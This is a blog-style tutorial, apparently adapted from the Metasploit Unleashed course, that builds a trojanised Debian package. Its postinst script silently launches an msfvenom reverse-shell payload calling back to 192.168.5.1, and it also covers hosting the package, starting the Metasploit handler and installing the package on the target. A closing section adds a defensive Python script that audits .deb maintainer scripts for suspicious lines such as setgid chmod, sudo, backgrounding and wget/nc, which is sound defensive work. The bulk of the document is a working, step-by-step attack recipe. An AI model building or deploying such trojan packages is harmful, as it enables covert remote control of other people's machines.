The Metasploit Framework (MSF) includes a utility called MSFvenom. MSFvenom can be used to generate and encode various payloads. It is currently maintained by the folks at Rapid7. My heroes at Offensive Security wrote an awesome tutorial demonstrating how to use MSFvenom as part of their free, ethical-hacking course called Metasploit Unleashed. Yet, I’m not going to lie. I had a little bit of trouble understanding what was happening when I took the tutorial on as a practical exercise. I had even more difficulty when I actually tried getting everything to work. Fortunately, those frustrating moments motivated me to try harder and come up with better notes. Below is my take on the original demo.

The Metasploit Unleashed (MSFU) course is provided free of charge by Offensive Security in order to raise awareness for underprivileged children in East Africa.


Using MSFvenom to Create a Remote Access Trojan (RAT)

Create the necessary directories

You will essentially need two main directories: one for the package files, another for the RAT.

mkdir thorse/
mkdir thorse/DEBIAN/            # will hold .deb package files
mkdir thorse/usr/
mkdir thorse/usr/share/         # not required, but for fun below
mkdir thorse/usr/local/
mkdir thorse/usr/local/bin/     # will hold your MSFvenom payload

Create the package files

The control file.

vim thorse/DEBIAN/control # required file
Package: thorse
Version: 666
Maintainer: Odysseus
Architecture: all
Description: For wreckin decks!

A goofy banner.

vim thorse/usr/share/banner.txt # not required, but for fun
         IT'S A TRAP!
     >>\.
    /_  )`.
   /  _)`^)`.   _.---. _
  (_,' \  `^-)""      `.\
        |              | \
        \              / |
       / \  /.___.'\  (\ (_
      < ,"||     \ |`. \`-'
       \\ ()      )|  )/
       |_>|>     /_] //
         /_]        /_]

The post-install file.

vim thorse/DEBIAN/postinst # required
#!/bin/sh

sudo chmod 2755 /usr/local/bin/thorse

if [ $? -eq 0 ]
then
	/usr/local/bin/thorse &
	cat /usr/share/banner.txt # not required
fi

chmod 755 thorse/DEBIAN/postinst # dpkg-deb refuses to build if maintainer scripts are not executable

Generate the payload

The full command is long, so I have broken it up here for readability.

# -a x64                          CPU arch of target system
# --platform linux                OS of target system
# -p linux/x64/shell/reverse_tcp  payload (staged: the handler sends the second stage)
# LHOST=192.168.5.1               local handler for target system
# LPORT=8888                      port for target to use upon exploitation
# -b "\x00"                       bad bytes to avoid when generating the payload
# -f elf                          format
# -e x64/xor                      encoder
# -o thorse/usr/local/bin/thorse  output file; postinst must match this file path

msfvenom \
  -a x64 \
  --platform linux \
  -p linux/x64/shell/reverse_tcp \
  LHOST=192.168.5.1 \
  LPORT=8888 \
  -b "\x00" \
  -f elf \
  -e x64/xor \
  -o thorse/usr/local/bin/thorse

Build the package (RAT)

Output will be a .deb file.

dpkg --build thorse/    # writes thorse.deb in the current directory

Get the RAT into position

Copy it to the default web server directory and restart the service as needed.

cp thorse.deb /var/www/html/
service apache2 restart

Start the RAT handler

Consider running your handler using screen. If not, you’ll need to have a dedicated terminal window open while the handler is running.

msfconsole
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.5.1
msf exploit(multi/handler) > set LPORT 8888
msf exploit(multi/handler) > run
[*] Started reverse handler on 192.168.5.1:8888

Exploit

For the RAT to work, it must be downloaded and then installed on the target.

wget http://192.168.5.1/thorse.deb
dpkg -i thorse.deb

pwned
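The flip side of this demo is the check a defender (or anyone handed a stray .deb) would run before typing dpkg -i. The script below is an added example of mine, not code from this post, from Metasploit Unleashed or from dpkg: it reads a .deb with the Python standard library only (the outer ar container, then the control tarball), pulls out the maintainer scripts and flags exactly the things the thorse package leans on: a setgid chmod, sudo inside a script that already runs as root, a backgrounded process and an executable under /usr/local/bin. The package it inspects is constructed in memory with the same layout as thorse.deb, with a placeholder text file where the msfvenom binary would sit; the rule list and function names are my own.

```python
"""Audit a Debian package's maintainer scripts before installing it (added example).

A .deb is an `ar` archive holding `debian-binary`, `control.tar.*` (control file
plus preinst/postinst/prerm/postrm) and `data.tar.*` (the files installed).
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# (finding description, regex applied to every non-comment line of a script)
RULES = [
    ("backgrounds a process with '&'", re.compile(r"(?<![&>|])&(?![&>])")),
    ("sets setuid/setgid bits with chmod", re.compile(r"chmod\s+[2-7]\d{3}\b|chmod\s+\S*[ug]\+s")),
    ("calls sudo (maintainer scripts already run as root)", re.compile(r"\bsudo\b")),
    ("runs or modifies something under /usr/local/bin", re.compile(r"/usr/local/bin/\S+")),
    ("downloads or connects out", re.compile(r"\b(curl|wget|nc|ncat)\b")),
]


def parse_ar(blob):
    """Return {member name: bytes} for an ar archive (the outer .deb container)."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                       # fixed 60-byte ASCII header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header at offset %d" % pos)
        name = hdr[:16].decode("ascii").rstrip(" /")   # BSD pads with spaces, GNU appends '/'
        size = int(hdr[48:58].decode("ascii").strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)                  # members are padded to an even offset
    return members


def maintainer_scripts(deb_bytes):
    """Return {script name: text} for every maintainer script in the package."""
    members = parse_ar(deb_bytes)
    ctrl = next((n for n in members if n.startswith("control.tar")), None)
    if ctrl is None:
        raise ValueError("package has no control.tar member")
    scripts = {}
    # mode "r:*" lets tarfile detect gzip, xz or uncompressed control archives
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tar:
        for member in tar.getmembers():
            base = member.name.split("/")[-1]
            if member.isfile() and base in MAINTAINER_SCRIPTS:
                scripts[base] = tar.extractfile(member).read().decode("utf-8", "replace")
    return scripts


def audit_deb(deb_bytes):
    """Return [(script, line number, description, line)] for every rule that fires."""
    findings = []
    for script, text in maintainer_scripts(deb_bytes).items():
        for lineno, line in enumerate(text.splitlines(), 1):
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            for description, pattern in RULES:
                if pattern.search(line):
                    findings.append((script, lineno, description, line))
    return findings


# --- constructed sample input: a stand-in for thorse.deb, no real payload ----

def _tar_gz(files):
    """Build a gzip tar from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (mode, data) in files.items():
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(data), mode
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ar(members):
    """Build an ar archive from [(name, bytes)]; names must be at most 16 chars."""
    out = bytearray(b"!<arch>\n")
    for name, data in members:
        out += ("%-16s%-12d%-6d%-6d%-8s%-10d`\n" % (name, 0, 0, 0, "100644", len(data))).encode()
        out += data + (b"\n" if len(data) & 1 else b"")
    return bytes(out)


# Same postinst as the post, minus the banner comment.
THORSE_POSTINST = b"#!/bin/sh\n\nsudo chmod 2755 /usr/local/bin/thorse\n\nif [ $? -eq 0 ]\nthen\n\t/usr/local/bin/thorse &\n\tcat /usr/share/banner.txt\nfi\n"


def build_sample_deb(postinst=THORSE_POSTINST):
    """Assemble a .deb with the post's control file and the given postinst."""
    control = _tar_gz({
        "./control": (0o644, b"Package: thorse\nVersion: 666\nMaintainer: Odysseus\n"
                             b"Architecture: all\nDescription: For wreckin decks!\n"),
        "./postinst": (0o755, postinst),
    })
    data = _tar_gz({"./usr/local/bin/thorse": (0o644, b"placeholder, not a payload\n")})
    return _ar([("debian-binary", b"2.0\n"), ("control.tar.gz", control), ("data.tar.gz", data)])


if __name__ == "__main__":
    for script, lineno, why, line in audit_deb(build_sample_deb()):
        print("%s:%d: %s: %s" % (script, lineno, why, line))
```

Run against the constructed package, audit_deb reports five findings, all on lines 3 and 7 of postinst (the chmod 2755 / sudo line and the backgrounded /usr/local/bin/thorse); a plain postinst that only runs ldconfig produces none. The rules are deliberately coarse: a legitimate package can background a daemon or chmod a helper, so the output is a prompt to read the script, not a verdict. To audit a real file, pass `open("thorse.deb", "rb").read()` to audit_deb.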